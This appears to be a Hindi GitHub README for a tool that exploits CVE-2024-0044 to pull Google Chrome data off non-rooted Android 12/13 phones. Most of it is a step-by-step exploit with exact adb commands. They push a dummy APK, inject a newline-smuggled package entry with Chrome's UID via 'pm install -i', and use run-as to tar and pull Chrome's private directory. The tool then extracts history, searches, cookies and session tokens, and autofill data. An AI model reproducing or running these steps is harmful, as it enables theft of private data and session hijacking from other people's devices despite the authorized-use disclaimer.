
Android उपकरणों से Google Chrome कलाकृतियों को निकालने और विश्लेषण करने के लिए एक मजबूत डिजिटल फोरेंसिक उपकरण
Android उपकरणों से Google Chrome कलाकृतियों को निकालने और विश्लेषण करने के लिए एक मजबूत डिजिटल फोरेंसिक उपकरण
विशेषताएं • स्थापना • उपयोग • दस्तावेज़ीकरण
लेखक: JackTekno
GitHub: github.com/JackTekno
यह उपकरण CVE-2024-0044 (Run-as) भेद्यता का उपयोग करता है ताकि गैर-रूटेड Android 12/13 उपकरणों पर अनुमति प्रतिबंधों को बायपास किया जा सके और Google Chrome डेटा का फोरेंसिक निष्कर्षण सक्षम हो सके। उपकरण कच्चे SQLite डेटाबेस को पार्स करता है और व्यापक विश्लेषण रिपोर्ट तैयार करता है।

अधिग्रहण से रिपोर्टिंग तक पूर्ण फोरेंसिक विश्लेषण कार्यप्रवाह
उपकरण निम्नलिखित शीटों के साथ एक व्यापक Excel रिपोर्ट (result_chrome_forensic.xlsx) तैयार करता है:
F-Droid.apk)रिपॉजिटरी क्लोन करें
git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
cd Chrome-Forensic_CVE-2024-0044
निर्भरताएँ स्थापित करें
pip install -r requirements.txt
# एक डमी APK को अस्थायी फ़ोल्डर में पुश करें
adb push F-Droid.apk /data/local/tmp/base.apk
adb shell pm list packages -U | grep com.android.chrome
# आउटपुट उदाहरण: package:com.android.chrome uid:10129
# UID नोट करें (जैसे, 10129)
⚠️
10129को चरण 3 से अपने वास्तविक क्रोम UID से बदलें
adb shell
# ADB शेल के अंदर:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# पैकेज मैनेजर को ट्रिगर करें
pm install -i "$PAYLOAD" /data/local/tmp/base.apk
# अभी भी ADB शेल के अंदर
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar
# ADB शेल से बाहर निकलें
exit
adb pull /data/local/tmp/chrome.tar .
'chrome.tar' फ़ाइल को प्रोजेक्ट फ़ोल्डर में निकालें। आपको फ़ाइलों को मैन्युअल रूप से स्थानांतरित करने की आवश्यकता नहीं है। Python स्क्रिप्ट स्वचालित रूप से निकाले गए फ़ोल्डरों के अंदर डेटाबेस फ़ाइलों को ढूंढ लेगी।
tar -xf chrome.tar
फोरेंसिक विश्लेषण उपकरण चलाएँ:
python3 chrome_forensic.py
उपकरण डेटाबेस फ़ाइलों का विश्लेषण करेगा और उसी निर्देशिका में result_chrome_forensic.xlsx उत्पन्न करेगा।
⚠️ महत्वपूर्ण: यह उपकरण केवल शैक्षिक और अधिकृत फोरेंसिक विश्लेषण उद्देश्यों के लिए डिज़ाइन किया गया है।
- केवल उन उपकरणों पर उपयोग करें जिनके आप मालिक हैं या जिनका विश्लेषण करने की स्पष्ट लिखित अनुमति है
- डिजिटल उपकरणों तक अनधिकृत पहुँच आपके अधिकार क्षेत्र के कानूनों का उल्लंघन कर सकती है
- लेखक इस उपकरण के दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं
योगदान का स्वागत है! कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें।
यह प्रोजेक्ट GNU जनरल पब्लिक लाइसेंस v3.0 के तहत लाइसेंस प्राप्त है। विवरण के लिए LICENSE फ़ाइल देखें।
अधिग्रहण विधि के लिए प्रूफ ऑफ कॉन्सेप्ट को Tinyhack.com द्वारा संक्षेपित और साझा किया गया था।
JackTekno द्वारा ❤️ से बनाया गया
⭐ इस रिपॉजिटरी को स्टार करें • 🐛 बग रिपोर्ट करें • 💡 फीचर का अनुरोध करें
| शीट नाम | विवरण |
|---|
| 📖 ब्राउज़िंग इतिहास | देखे गए URL का विस्तृत समयरेखा |
| 📈 विश्लेषण – शीर्ष साइटें | सबसे अधिक देखे गए डोमेन की सांख्यिकीय रैंकिंग |
| ⚠️ चेतावनी – संदिग्ध | स्वचालित रूप से चिह्नित URL (हैकिंग, ड्रग्स, वयस्क सामग्री) |
| 📥 डाउनलोड | पथ और फ़ाइल आकार सहित डाउनलोड इतिहास |
| 🔍 खोज शब्द | ओम्निबॉक्स/गूगल से उपयोगकर्ता खोज प्रश्न |
| 🍪 कुकीज़ और सत्र | सत्र टोकन और कुकी मेटाडेटा (हेक्स एन्क्रिप्टेड) |
| ✍️ ऑटोफ़िल डेटा | सहेजे गए फ़ॉर्म डेटा (नाम, पते, आदि) |